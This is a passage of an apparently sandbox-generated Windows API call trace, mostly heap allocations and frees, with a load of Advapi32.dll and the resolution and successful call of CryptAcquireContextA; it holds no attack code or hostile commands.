lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0142.604] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0142.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0142.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0142.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0142.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0142.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.605] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0142.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0142.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0142.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0142.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0142.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0142.608] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0142.608] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0142.608] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0142.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0142.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.609] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0142.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0142.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.610] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.610] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0142.610] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0142.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.611] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0142.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0142.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0142.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0142.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0142.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0142.684] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0142.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0142.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0142.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b48 [0142.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0142.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0142.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0142.685] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0142.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0142.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0142.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0142.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0142.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0142.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0142.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0142.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0142.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0142.686] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0142.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0142.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0142.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0142.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0142.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0142.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0142.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0142.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0142.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0142.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0142.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0142.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0142.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0144.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0144.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 